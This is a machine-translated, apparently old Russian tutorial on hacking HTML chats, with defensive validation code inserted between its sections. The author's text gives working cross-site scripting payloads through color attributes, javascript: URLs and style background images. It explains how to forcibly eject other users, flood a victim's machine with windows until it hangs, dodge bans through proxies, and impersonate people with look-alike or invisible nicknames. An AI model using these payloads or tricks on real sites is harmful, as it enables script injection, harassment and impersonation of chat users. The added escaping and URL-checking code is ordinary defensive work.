This page has been robot translated, sorry for typos if any. Original content here.

Hacking Chat Part 1 (Theory and Practice)





    This page does not in any way call for illegal activities, "cracking", etc. The main goal is to study the features of HTML and to prevent errors associated with its use. The author bears no responsibility for any illegal use of the information provided. The author informed the chat administrations about all the errors found in their chats.
    All the examples given in the article are tested and work in MSIE 5.50.4134.0600. I cannot guarantee that they work in other versions, but I am sure that almost all of the examples will work there.

    Contents

    Hacking through the nickname (handler without quotes)
    Hacking through the nickname (handler enclosed in quotation marks)
    Hacking through the nickname (the filter does not pass quotes / symbols)
    Hacking through color (attribute without quotes)
    Hacking through color (attribute with quotes)
    Which symbols to check the filters for
    Handler delimiters
    Nickname forgery, empty nicknames

    General theory

    Here I want to dwell on the basics of hacking chats. I apologize in advance to advanced readers: these methods have long been known and are as old as the world. If you are sufficiently advanced, you can skip to the following chapters.

    First of all I want to note that each chat is original and unique (except for replicated copies of the same chat script, of course). Therefore there are absolutely no universal ways of hacking. Almost every chat has features that need to be taken into account, and without taking them into account stupid templates will not work.

    Next, what do I actually mean by hacking an HTML chat? Not banal flooding, and not attacks on the chat server's IP. By hacking I mean an unauthorized change to the HTML of the chat document, or access to hidden parts of it (for example, private rooms), that is, an effect on the chat that was not intended or permitted for users. This applies not only to chats but also to forums, guest books, etc. (where all the described methods also work, and even better, because such forms are as a rule protected worse than chats).

    All of the above applies only to HTML chats. Hacking Java chats is a separate and completely different story. I hope you can tell one type of chat from the other :).

    So, we stand on the threshold of an HTML chat. Let's say we want to test it for "strength". What should we do first? First of all, connect through an anonymous proxy (I hope you know what that is). This is necessary for two reasons: first, it gives us anonymity (so that the admin does not come after us), and second, if the admin does not like our experiments and kicks us out of the chat, we can switch the proxy to another IP address and enter the chat again. There is one catch: some chats do not allow entry through public proxies.

    Next, we need to find out what kind of weapons we have, that is, which attributes the user can set. As a rule, in all chats you can enter the user's nickname as well as the user's COLOR. In addition, sometimes you can set the user's e-mail, home page, gender, the chat refresh rate, etc. In practice, the fields of interest are color, nickname, e-mail and home page: they are inserted directly into the body of the document, and therefore it is through them that you can attack the chat. Note that in some chats you need to register, and some of the attributes are set at registration and some just before entering the chat (or already inside it). Chats with registration are, as a rule, more elaborate and better protected.

    Let us outline the possible ways of hacking. First of all, we look closely at the fragment of the form where the color of our messages is set (by the way, color can be set separately for the nickname and for the text of messages; you need to check both, because the chat may process them differently). Why are we primarily interested in color? Because the color appears inside tags, in their parameters, unlike, for example, the nickname, which most often appears in the body of the tags. And to hack a chat we need to get inside the parameters of a tag, so that we can change its attributes or insert our script (sometimes, of course, any tags can be written simply in the text of messages; until recently this was the case with chat.rambler.ru, for example, but this option is so dumb that such chats probably no longer exist, and I do not consider it).

    We are interested in what information about the color is sent to the server. The least secure variant is when the color is passed as its name. For example:

    <select name=youcolor style="width: 70px">
    <option value=blue>синий
    <option value=red>красный
    <option value=darkred>т-красный
    <option value=green>зеленый
    <option value=black>черный
    <option value=lightblue>голубой
    </select>

    Such a chat, as a rule, can be broken to some extent :). A worse option is when the color is passed as a numeric code:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>синий
    <option value=#AF0000>красный
    <option value=#FF0000>т-красный
    <option value=green>зеленый
    <option value=#000000>черный
    <option value=#0000AF>голубой
    </select>

    In such a chat there are probably filters on all symbols except digits, the # sign and the letters A, B, C, D, E and F. Then we have to forget about hacking through the color.

    And finally the worst option, when the color is simply passed as a number from the list of acceptable colors:

    <select name=youcolor style="width:70px">
    <option value=1>синий
    <option value=2>красный
    <option value=3>т-красный
    <option value=4>зеленый
    <option value=5>черный
    <option value=6>голубой
    </select>

    As a rule, such a chat cannot be hacked through color (often it is simply impossible). This is the most secure option (by the way, I recommend it to chat developers).
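As an added illustration of the three variants from the defending side (example code, not from the original article): each function builds the opening tag of a message the way the R chat later in the article does it, with the color inserted unquoted, and the crude hasExtraAttributes check shows which variant lets an attribute smuggled into the color value through. The tag name, the color table and the fallback color are assumptions of this example.

```javascript
// Added example, not code from the original article: the three ways of
// passing the color field, rendered as the <font color=...> tag the R chat
// used (the tag name, the color table and the fallback are assumptions).

const ALLOWED_COLORS = ["blue", "red", "darkred", "green", "black", "lightblue"];

// Variant 1 (weakest): the color name from the form is trusted and inserted
// unquoted. Everything after a space becomes a further attribute of the tag.
function fontTagByName(color) {
  return `<font color=${color}>`;
}

// Variant 2: a hex code, accepted only if it is "#" plus exactly six hex
// digits; anything else falls back to black.
function fontTagByHex(color) {
  const safe = /^#[0-9A-Fa-f]{6}$/.test(color) ? color : "#000000";
  return `<font color=${safe}>`;
}

// Variant 3 (strongest): the form sends only a 1-based index and the server
// looks the color up in its own table, so no user text reaches the HTML.
function fontTagByIndex(index) {
  const i = Number(index);
  const inRange = Number.isInteger(i) && i >= 1 && i <= ALLOWED_COLORS.length;
  const color = inRange ? ALLOWED_COLORS[i - 1] : ALLOWED_COLORS[0];
  return `<font color=${color}>`;
}

// Crude check used only to compare the variants: does the opening tag carry
// anything besides a single color attribute, or open a second tag?
function hasExtraAttributes(tag) {
  const end = tag.indexOf(">");
  if (end !== tag.length - 1) return true; // a second tag was opened
  const attrs = tag.slice("<font ".length, end).trim().split(/\s+/);
  return attrs.length > 1;
}
```

Running fontTagByName("red size=20") through hasExtraAttributes flags the smuggled size attribute; the hex and index variants turn the same input into a plain tag because the user's text never reaches the markup.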

    Next, we need to change the HTML code so that we can freely send arbitrary attribute values to the server. To do this, save the site to your disk and change the chat login (or registration) form as follows: change the relative address in the form's action parameter to the full address; replace all inputs of type hidden with type text, and select tags with input; in addition, remove the restrictions on the length of the input value (if any). For example, if the original form looked like this:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12" >
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Then after the appropriate substitutions, we get:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue

    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Note that a document may be created dynamically via functions like document.write(); then, most likely, you will have to convert it to a static form. In addition, it often happens that after saving the HTML to disk the chat does not want to open. This can be caused by the site not having been saved completely, if it consisted of frames. In this case, you need to understand the structure of the page better and save everything properly. Another reason may be that the server checks the Referer field of the HTTP request header and detects that we are not coming from its page. In this case, you need to use other methods, which we will discuss in the chapter "Hacking at the level of HTTP".

    Now we can experiment with the chat. First of all you need to find out what filters there are on the input values (first for color and nickname). We are primarily interested in the following symbols:

    " ' ` = < > ; \ & % space

    We enter them into the color field and the nickname, enter the chat (if we are allowed in with such attributes; if not, we will have to go through the characters one by one), and see which symbols were let through by the filter (by writing something like "hello" to the chat and looking in the HTML source at which color and nick symbols are present). Some chats simply delete the filtered characters, some replace them with other symbols, and some convert them to an encoded form (HTML entities such as &lt; for <). Such transformed symbols do not suit us, since HTML does not interpret them as markup (however, for more details see the chapter "A few more hacks of the long-suffering T chat").

    As a result, we must have a list of characters that are let through for each attribute of the registration form.

    Next, our task is to get inside some tag in order to change its parameters or insert our script there. There are two fundamentally different ways to do this: the first is that the code we need is passed through attributes that are already inside the tag (i.e. between the angle brackets), for example through the color or the e-mail address. The second is to break the structure of the HTML code in such a way that the code we need ends up inside a tag. Which to use is determined by analyzing the concrete structure of the chat code and the set of unfiltered symbols for our attributes. We will consider various hacking variants in the following examples. In the meantime, I would like to dwell on some features of HTML that actually make such interesting "effects" possible.

    HTML Features

    Here I am not going to lecture on HTML for dummies. I hope that you know what a tag and its parameters are, are familiar with JavaScript and have written at least one web page in your life in HTML (and not in FrontPage).

    The biggest trouble (and at the same time the strength) of HTML is that it does not have a single standard. That is, there seems to be one, but the standards are so diverse, and so much is intertwined in HTML, that nobody knows it thoroughly (and often does not know what it is). In addition, competition among browsers and the heterogeneity of sites lead browsers to try to support as many standards and technologies as possible. And the lack of common standards has led to webmasters managing to mix different styles in different ways even on a single page :o(. However, this is what allows hackers to hack HTML, and gives developers a lot of headaches.

    A simple question: what are the delimiters in HTML and JavaScript? Even I cannot answer this question immediately and unequivocally. Let's consider an example:

    <font onclick= "alert()">Text</font>

    Here everything is clear and obvious. There is a tag with a click event handler written in JavaScript, the text of which is enclosed in double quotes. The fact that JavaScript is used can be specified explicitly:

    <font onclick="javascript:alert()">Text</font>

    The string delimiters in these examples are double quotes. However, you can do without them. Since only a static handler string can follow onclick=, HTML allows the quotes to be omitted (this applies to many cases where the argument can only be a string constant). So this construction also works:

    <font onclick=alert()>Text</font>

    And now, instead of an empty message, we insert something meaningful:

    <font onclick=alert('Привет друзья!')>Text</font>

    If you try it, this example does not work. The reason is this: the handler body may be written without quotes, but then the first space is taken as the end of the handler string (even if that space is itself inside quotes). Therefore the browser considers the handler to be only the fragment alert('Привет, and on finding an unclosed quote it reports an error. Why does the browser not react to the space inside the quotes? I think the reason is that two languages are mixed here: HTML and JavaScript. The browser "saw" that there was no quotation mark after the = sign and therefore looked for a space as the end of the handler; the inside of the handler did not interest it at that moment, since it belonged not to HTML but to JavaScript. The following parameter values work without errors:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    Note an important feature: if the value of a tag parameter is in quotation marks, then the space before the next parameter can be omitted (the third line of the example). The fourth line also works (in the sense that the browser does not complain, though of course the script does not run), because the browser does not treat the contents of the color attribute as JavaScript, and therefore does not complain about the open quote, although it takes only the fragment alert(' (since a color in HTML can be an arbitrary string, in which case the browser converts the string into some numeric value that it treats as the color).

    Whether there are other delimiter characters for an unquoted handler (besides a space and the > symbol) is an open question. I do not know of any, but I admit there may be.

    As you can see from the examples above, string delimiters can be double and single quotes. This applies equally to HTML and JavaScript; however, it turns out there is at least one more character that is a string delimiter in HTML (but not in JavaScript!). This is the backquote ` (usually located on the same key as the letter Ё). You can verify this with the following example:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    I bet that at least 90% of webmasters do not know about it! In any case, I have not yet seen anyone use the backquote. This symbol is a godsend :).
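The delimiter observations above, together with the symbol list from the "General theory" chapter, are what an output encoder has to survive. The following is an added example (not code from the original article) that runs that symbol list through two encoders: naiveFilter is an assumption standing in for a chat that only strips angle brackets, and escapeAttr is a strict encoder that also escapes the backquote, since the browser discussed here treats it as an attribute delimiter. The audit helpers report which probe characters come out unchanged.

```javascript
// Added example, not from the original article. PROBE_CHARS is the list
// the article says to test; the two encoders are assumptions for contrast.

const PROBE_CHARS = ['"', "'", "`", "=", "<", ">", ";", "\\", "&", "%", " "];

// What many old chats did: remove < and > and nothing else.
function naiveFilter(s) {
  return String(s).replace(/[<>]/g, "");
}

const ATTR_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};

// Escape a value for use inside a *quoted* HTML attribute. The backquote is
// included because Internet Explorer accepts it as an attribute delimiter.
function escapeAttr(s) {
  return String(s).replace(/[&<>"'`]/g, (c) => ATTR_ESCAPES[c]);
}

// Always emit the attribute quoted; with escapeAttr the quote cannot be
// closed early, so a space inside the value no longer starts a new attribute.
function colorAttr(value) {
  return `color="${escapeAttr(value)}"`;
}

// Which probe characters does `encode` pass through completely unchanged?
function surviving(encode, chars = PROBE_CHARS) {
  return chars.filter((c) => encode(c) === c);
}

// Of those, which ones can still break out of a quoted attribute or start
// markup? An empty result is what a correct encoder must produce.
function findings(encode) {
  const dangerous = new Set(['"', "'", "`", "<", ">", "&"]);
  return surviving(encode).filter((c) => dangerous.has(c));
}
```

The characters that escapeAttr leaves alone (=, ;, \, % and the space) are harmless inside a quoted attribute; the naive filter, by contrast, leaves all three quote characters and the ampersand untouched, which is exactly the gap the rest of the article exploits.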

    It often happens that you need to use quotation marks inside other quotation marks. And this is difficult, especially if the chat lets through only one kind of quotes. But it turns out JavaScript allows you to insert string constants inside other string constants using the same quotes! For example:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    The example uses nested single quotes, yet the interpreter does not raise an error. Note that the contents of the inner quotes are not arbitrary: they must not contain spaces, and some symbols, for example ; or ), are not allowed at the end.

    Now let's talk about links. First of all, note this detail: the Internet developed in such a way that it mixed completely different technologies. Information can be accessed through a large number of different protocols. Therefore, when specifying the full path of a document (URL), any of the protocols the browser knows may be specified. It is noteworthy that javascript is also counted among the protocols (although it is not one; apparently the developers considered that allocating a separate concept for scripts would be too bold, and ranked them with the protocols). Therefore, wherever you can specify a URL in an HTML document, you can insert a script. And this script will run as soon as the user (or the browser itself) requests this link. For example:

    <a href=javascript:alert()>Text</a>

    Interestingly, in addition to statements, a JavaScript link can simply contain a string (or numeric) value (but necessarily after the statements, if there are any). When you click on such a link, the browser first executes the preceding statements, and then opens a new document and places the value of the last string in it:

    <a href=javascript:alert();'Hello!!'>Text</a>

    Note that tags cannot be inserted into the new page in this way.

    Hacking R chat

    Here is an example of one of the first chats I hacked. This chat was very simple and was hacked, as they say, on the first try :).

    Now there are few chats left in which this works. Although I thought of these methods myself, I later found them in hacker magazines.

    The input form of this chat corresponded exactly to the form given in the chapter "General theory". After converting and saving the form to disk, I checked which characters pass in the color attribute. It turned out that the following symbols pass (of those that interest us, see the "General theory" chapter):

    ' ` = ; % space

    Well, of course, all the digits and letters passed. The length of the color value string was not limited. Next, I looked at exactly where the color is inserted in the message frame. Here is a fragment of this frame:

    <font color=Black><b>Путник</b>- Alpha, привет ))</font>
    <font color=Red><b>Alpha</b>- Всемприветик !!</font>

    As you can see, the color is inserted without surrounding quotes. This suited me. I logged in under the nickname Shram (well, or almost that nickname ;)) and with the color red size=20. My post looked like this:

    <font color=red size=20><b>Algol</b>- Hi</font>

    It was printed in a very large font, which surprised the population of the chat :).

    Thus, although we cannot insert tags directly, the permission to enter a space in the color attribute allowed us to specify unauthorized parameters of the tag. However, this of course was not enough for me. Changing the font size is cool, but something really useful can only be done with scripts. I could not insert a script tag directly (or rather, at that time I did not yet know how). But I could attach a handler to some event of the tag. Here is the color I set in order to remove some nerd from the chat:

    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30

    Then I sent him a long, long message in private. I chose the color of the message so that it would not differ from the background color, and the font size and the length of the message were so huge that the victim probably passed the mouse over the message at least once, whereupon my onmouseover handler pressed the "leave chat" button instead of the user :).

    However, gradually clever folks appeared who figured out the trick and deliberately did not move the cursor over the chat window. My script did not always work :(. At first I thought there was no way out, because I could insert the script only as an event handler, so if the event did not fire, the script did not run. But, digging into the "annals", I found a solution (it has since become trivial and widely known). It turned out that in the style attribute you can specify the URL of a background image for the tag, and where you can specify a URL you can write a script; most importantly, the background image is loaded by itself when the HTML document loads! To show an alert to the chat participants, I logged in with the following color:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    An important detail should be noted: since the structure of most HTML chats is such that the page is refreshed regularly, a script sent this way is executed more than once, in fact many times, until our message disappears from the screen.

    And here is how the value of the color attribute for dropping someone out of the chat looked:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    You need to remember: a script sent in private will be seen not only by your "interlocutor" but by yourself, so you need to know how to protect yourself from its effect. This can be done in two ways: either put yourself on ignore (and then you will not see your own messages), or disable the display of pictures in the browser settings. Then a script that fires through the background image will not work.
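The two places the article has used so far to smuggle a script, a URL in a link and a URL inside url() in a style attribute, are both covered by one server-side check. The following is an added example (not code from the original article): isSafeUrl accepts only relative paths and http(s), comparing the scheme after stripping whitespace and control characters, and isSafeStyle applies it to every url() it finds in a style value. Whether protocol-relative "//host" URLs are allowed is a policy switch and an assumption of this example.

```javascript
// Added example, not from the original article: a URL checker for href
// values and for url(...) inside style attributes, written from the
// defender's side. SAFE_SCHEMES and the policy switch are assumptions.

const SAFE_SCHEMES = new Set(["http", "https"]);

function isSafeUrl(raw, { allowProtocolRelative = false } = {}) {
  if (typeof raw !== "string") return false;
  // Drop whitespace and C0/C1 control characters anywhere in the value:
  // browsers ignore them when parsing the scheme, so the check must too.
  const url = raw.replace(/[\u0000-\u0020\u007f-\u009f]/g, "");
  if (url === "") return false;
  if (url.startsWith("//")) return allowProtocolRelative;
  const m = url.match(/^([a-zA-Z][a-zA-Z0-9+.-]*):/);
  if (!m) return true; // no scheme at all: a relative URL
  return SAFE_SCHEMES.has(m[1].toLowerCase());
}

// A style attribute is safe only if every url(...) argument is. The
// argument is taken up to the closing parenthesis, quotes included, so a
// quoted or malformed argument still reaches isSafeUrl.
function isSafeStyle(style) {
  const re = /url\(\s*['"]?([^)]*)/gi;
  let m;
  while ((m = re.exec(String(style))) !== null) {
    if (!isSafeUrl(m[1])) return false;
  }
  return true;
}
```

The check is meant to run before the value is written into the page, and it complements, rather than replaces, attribute escaping: a URL that passes here still has to be inserted quoted and escaped.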

    Now I want to show some useful scripts that can be used in hacked chats:

    javascript:navigate('http://myserver.ru'); - loads myserver.ru into the current frame (or page).
    Some chats, on seeing the fragment http://, treat it as a link and automatically insert an <a> tag. Since this will destroy our script, it must not be allowed to happen. To avoid it, simply omit the http: prefix (which is assumed by default anyway). Then the script looks like this: javascript:navigate('//myserver.ru'); . The two leading slashes are mandatory.

    javascript:parent.frames[2].document.location='http://myserver.ru' - loads myserver.ru into one of the frames.

    javascript:for(;;)open() - opens an infinite number of windows (if not stopped in time, it leads to the machine hanging and a subsequent reboot).

    javascript:document.write('<script>alert()</script>') - replaces the current frame with a script, which is then executed. Note: if the chat does not let < and > through (and that is the overwhelming majority of chats), then we cannot insert such a script. But there is a way out: the unescape() function, which converts the code of a character into the character itself. Replacing the angle brackets with unescape() calls with the corresponding codes, our script looks like this:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E'))

    javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - inserts a picture after the text. Note that in IE 5.x you can insert any tag other than FRAME, IFRAME and SELECT. But in IE 4.x the createElement() function allows only the IMG, AREA and OPTION tags to be inserted. I have no information about Netscape; you can experiment yourself.

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' - blocks the context menu of the page, and therefore makes viewing the HTML source of the frame inaccessible. Thanks to this, you can hide your machinations with the chat body :).

    Sometimes it is useful to log in with someone else's nickname. Chats with a user registration system will not let you do this if you do not know the password (and you probably do not). The banal way out: register a nickname in which a Latin letter is replaced with a very similar letter of the Russian layout. For example, log in under the nickname admin where the Latin letter a is replaced with the Russian а. The method is primitive, but it works :)). There are also harder cases. For example, in some chats it is forbidden to use characters from different layouts in one nick. Then the inquisitive mind has no choice but to turn to Uncle Gates for help. And lo, in its kindness Microsoft did not forget about sinful users and gave us the symbol &shy; (also &#173;, i.e. %AD), which Microsoft called "soft hyphen" ("short hyphen"). It really looks like a hyphen in Word, in Excel too, and even in Notepad, but not in IE! For Microsoft's Internet Explorer, &shy; simply does not exist; that is, it seems to exist, but they forgot to give it a graphic representation. It simply is not displayed on the HTML page! Thus, by adding a soft hyphen to any nickname and registering under it, we enter the chat with a nickname that looks on the HTML page exactly like the nickname without the hyphen. And you can do even better: log in with a nickname consisting only of soft hyphen characters. Then your nickname will not be displayed in the chat at all, an absolutely empty place :)).

    (Note: while I was already messing about with the soft hyphen, I did find cases when it appears. It appears only as a hyphen: if there is a soft hyphen inside a word and the word is at the end of a line, then the part after the hyphen may be moved to the next line, and the hyphen itself becomes visible! So it is possible that the hyphen being invisible is a deliberate feature of Microsoft's (which does not, however, reduce its usefulness in hacking :)). True, it is not clear why it still always remains visible in other applications.)
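Both nickname forgeries described above, a Latin letter swapped for its Cyrillic look-alike and the invisible soft hyphen, are caught at registration by comparing what a nick looks like rather than its raw bytes. The following is an added example (not code from the original article): visibleForm strips characters that render as nothing, skeleton folds look-alike Cyrillic letters into Latin, and rejectNickname applies both to a candidate nick against the existing ones. The look-alike table is an assumption, a starting point rather than a complete confusables list, and so is the policy of refusing mixed-script nicks.

```javascript
// Added example, not from the original article: registration-time checks
// against invisible characters and look-alike letters in nicknames.

// Cyrillic letters whose glyphs coincide with Latin ones (an assumption:
// a starting table, not a complete confusables list).
const CYRILLIC_TO_LATIN = {
  "\u0430": "a", "\u0435": "e", "\u043E": "o", "\u0440": "p",
  "\u0441": "c", "\u0443": "y", "\u0445": "x",
  "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041A": "K", "\u041C": "M",
  "\u041D": "H", "\u041E": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T",
  "\u0425": "X",
};

// Remove characters that display as nothing: the soft hyphen (U+00AD) the
// article describes, plus zero-width characters and the byte-order mark.
function visibleForm(nick) {
  return String(nick).replace(/[\u00AD\u200B-\u200D\u2060\uFEFF]/g, "");
}

// Fold look-alikes into Latin and lowercase, giving a "skeleton" that two
// confusable nicks share even when their code points differ.
function skeleton(nick) {
  return visibleForm(nick)
    .replace(/[\u0400-\u04FF]/g, (c) => CYRILLIC_TO_LATIN[c] || c)
    .toLowerCase();
}

// Does the nick contain both Latin and Cyrillic letters?
function mixesScripts(nick) {
  return /[A-Za-z]/.test(nick) && /[\u0400-\u04FF]/.test(nick);
}

// Decide whether a new nick may be registered given the existing ones.
// Returns a reason string, or null when the nick is acceptable.
function rejectNickname(nick, existingNicks) {
  if (visibleForm(nick).trim() === "") return "nickname has no visible characters";
  if (nick !== visibleForm(nick)) return "nickname contains invisible characters";
  if (mixesScripts(nick)) return "nickname mixes Latin and Cyrillic letters";
  const sk = skeleton(nick);
  for (const other of existingNicks) {
    if (skeleton(other) === sk) return `nickname looks like "${other}"`;
  }
  return null;
}
```

Because the comparison is done on the skeleton, a nick written entirely in Cyrillic look-alikes (which passes the mixed-script rule) is still refused when it collides with an existing Latin nick.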


